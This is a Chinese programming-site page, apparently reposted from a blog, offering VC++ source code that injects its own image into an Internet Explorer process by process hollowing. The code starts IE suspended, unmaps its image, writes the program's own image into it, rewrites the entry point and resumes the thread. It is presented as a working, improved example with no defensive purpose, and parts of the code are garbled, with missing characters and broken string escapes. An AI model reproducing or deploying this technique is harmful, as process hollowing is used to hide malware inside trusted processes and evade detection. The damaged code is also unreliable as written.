当前位置:编程学习 > VC++ >>

一个将自己代码插入IE进程的例子(VC代码)

看着别人的程序想插那个进程就插那个,我也想试下,于是从网上找了几段代码,最容易理解的是下面的代码,不过原来的代码编译后在VC IDE下测试正常,但离开IDE就出错,经过测试和程序启动运行知道是因为编译后,IE尚未启动完成,程序本身已经退出是出错的原因,因些我改进了一下, 贴在下面:
编译须 ntdll.lib文件(可以从http://lengie.ik8.com/test/ntdll_lib_dl.htm下载,里有Win2K,XP 32B,XP 64B三个版本,对应拷到编译器的LIB文件夹里就可以了),可将下面代码保存为 .c 文件然后编译(保存为 .cpp 文件可能会出错)



#include <stdio.h>
#include <windows.h> 


#pragma comment(lib,"ntdll.lib") 


typedef long NTSTATUS; 


NTSYSAPI
NTSTATUS
NTAPI
ZwUnmapViewOfSection(
HANDLE ProcessHandle,
PVOID BaseAddress
); 


typedef struct _ChildProcessInfo
{
DWORD dwBaseAddress;
DWORD dwReserve;
} CHILDPROCESS; 


char szIePath[MAX_PATH]; 


BOOL FindIePath(char *IePath,int *dwBuffSize);
BOOL InjectProcess(void);
DWORD GetSelfImageSize(HMODULE hModule); 


BOOL CreateInjectProcess(
PPROCESS_INFORMATION pi,
PCONTEXT pThreadCxt,
CHILDPROCESS *pChildProcess
); 
int main(void)
{
if (InjectProcess())
{
printf("This is my a test code,made by shadow3.
");
}
else
{while(1){
MessageBox(NULL,"进程插入完成","Text",MB_OK);Sleep(1000);}
}
Sleep(1000);//等待IE启动 加上这句就可以正常了,呵呵.我设的时间可能有点长
return 0;
} 


BOOL FindIePath(char *IePath,int *dwBuffSize)
{
char szSystemDir[MAX_PATH];


GetSystemDirectory(szSystemDir,MAX_PATH);


szSystemDir[2] =;
lstrcat(szSystemDir,"\Program Files\Internet Explorer\iexplore.exe");


lstrcpy(IePath, szSystemDir);
return TRUE;
} 
BOOL InjectProcess(void)
{
char szModulePath[MAX_PATH];
DWORD dwImageSize = 0; 


STARTUPINFO si = {0};
PROCESS_INFORMATION pi;
CONTEXT ThreadCxt;
DWORD *PPEB;
DWORD dwWrite = 0;
CHILDPROCESS stChildProcess;
LPVOID lpVirtual = NULL;
PIMAGE_DOS_HEADER pDosheader = NULL;
PIMAGE_NT_HEADERS pVirPeHead = NULL; 


HMODULE hModule = NULL; 


ZeroMemory(szModulePath,MAX_PATH);
ZeroMemory(szIePath,MAX_PATH); 


GetModuleFileName(NULL,szModulePath,MAX_PATH);
FindIePath(szIePath,NULL); 


if ( lstrcmpiA(szIePath,szModulePath) == 0 )
{
return FALSE;
} 


hModule = GetModuleHandle(NULL);
if ( hModule == NULL )
{
return FALSE;
} 


pDosheader = (PIMAGE_DOS_HEADER)hModule;
pVirPeHead = (PIMAGE_NT_HEADERS)((DWORD)hModule + pDosheader->e_lfanew);
_asm nop;_asm nop;_asm nop;_asm nop;
dwImageSize = GetSelfImageSize(hModule);
_asm nop;_asm nop;_asm nop;_asm nop;
if ( CreateInjectProcess(&pi, &ThreadCxt ,&stChildProcess))
{
printf("CHILD PID: [%d]
",pi.dwProcessId); 
if ( ZwUnmapViewOfSection(
pi.hProcess,
(LPVOID)stChildProcess.dwBaseAddress
) == 0 )
{
lpVirtual = VirtualAllocEx(
pi.hProcess,
(LPVOID)hModule,
dwImageSize,
MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);


if ( lpVirtual )
{
printf("Unmapped and Allocated Mem Success.
");
} 


}
else
{
printf("ZwUnmapViewOfSection() failed.
");
return TRUE;
} 


if ( lpVirtual )
{
PPEB = (DWORD *)ThreadCxt.Ebx; 


// 重写装载地址 


WriteProcessMemory(
pi.hProcess,
&PPEB[2],
&lpVirtual,
sizeof(DWORD),
&dwWrite
); 
if ( WriteProcessMemory(
pi.hProcess,
lpVirtual,
hModule,
dwImageSize,
&dwWrite) )
{
printf("image inject into process success.
"); 


ThreadCxt.ContextFlags = CONTEXT_FULL;
if ( (DWORD)lpVirtual == stChildProcess.dwBaseAddress )
{
ThreadCxt.Eax = (DWORD)pVirPeHead->OptionalHeader.ImageBase + pVirPeHead->OptionalHeader.AddressOfEntryPoint;
}
else
{
ThreadCxt.Eax = (DWORD)lpVirtual + pVirPeHead->OptionalHeader.AddressOfEntryPoint;
} 


#ifdef DEBUG
printf("EAX = [0x%08x]
",ThreadCxt.Eax);
printf("EBX = [0x%08x]
",ThreadCxt.Ebx);
printf("ECX = [0x%08x]
",ThreadCxt.Ecx);
printf("EDX = [0x%08x]
",ThreadCxt.Edx);
printf("EIP = [0x%08x]
",ThreadCxt.Eip);
#endif 


SetThreadContext(pi.hThread, &ThreadCxt);
ResumeThread(pi.hThread); 


}
else
{
printf("WirteMemory Failed,code:%d
",GetLastError());
TerminateProcess(pi.hProcess, 0);
} 


}
else
{
printf("VirtualMemory Failed,code:%d
",GetLastError());
TerminateProcess(pi.hProcess, 0);
}
} 


return TRUE;
} 


DWORD GetSelfImageSize(HMODULE hModule)
{
DWORD dwImageSize; 


_asm
{
mov ecx,0x30
mov eax, fs:[ecx]
mov eax, [eax + 0x0c]
mov esi, [eax + 0x0c]
add esi,0x20
lodsd
mov dwImageSize,eax 


} 


return dwImageSize;
} 


BOOL CreateInjectProcess(
PPROCESS_INFORMATION pi,
PCONTEXT pThreadCxt,
CHILDPROCESS *pChildProcess
) 


{
STARTUPINFO si = {0}; 


DWORD *PPEB;
DWORD read; 


// 使用挂起模式启动ie 


if( CreateProcess(NULL, szIePath, NULL, NULL, 0, CREATE_SUSPENDED, NULL, NULL, &si, pi)||MessageBox(0,":(",":(",0))
{


pThreadCxt->ContextFlags = CONTEXT_FULL;
GetThreadContext(pi->hThread, pThreadCxt);
PPEB = (DWORD *)pThreadCxt->Ebx;


ReadProcessMemory(pi->hProcess,&PPEB[2],(LPVOID)&(pChildProcess->dwBaseAddress),sizeof(DWORD),&read);


return TRUE ; 


}
return FALSE;
}


 



转载本站文章请注明,转载自:Chinadu`s Blog
补充:软件开发 , Vc ,

上一个:VC判断文件是否存在
下一个:VC++ 判断文本文件是否UTF-8编码

更多图片编程知识:
更多VC++疑问解答:
VC++ 算法。
MFC CListCtrl获取列数出错了,怎么回事?
谁有VC++6.0企业版中文版的下载地址
vc++,关于TextOut的一个小问题
定义一个三维的CStringArray//一定要使用CArray模板?那操作的时候,使用那个类的函数对数组进行操作呢?
关于mfc消息映射的问题
MFC中用TextOut输出的问题
请问如何在VC6.0里MFC下对万年历进行编程
iArray.Add(iValue);//Add函数的参数不可以用CArray模板???
'USES_CONVERSION' : undeclared identifier;'A2W' : undeclared identifier
vc6.0能不能用CImage,能的话给个例子,以及atlimage.h,
VC 对话框 标题栏 怎么变成这个样子????如图!
spin控件的UDN_DELTAPOS消息//下面代码什么作用? [
VC修改DNF
vc 套接字 struct
asp
php
Delphi
Matlab
JSP
Foxpro
JS
C/C++
C#/ASP.NET
VC++
JAVA
VB
汇编语言
html/css
CGI
XML/UML
wap
网站相关
网页素材
python
微信小程序
thinkphp
如果你遇到编程学习难题:
访问www.zzzyk.com 试试
CopyRight © 2022 站长资源库 编程知识问答 zzzyk.com All Rights Reserved
部分文章来自网络,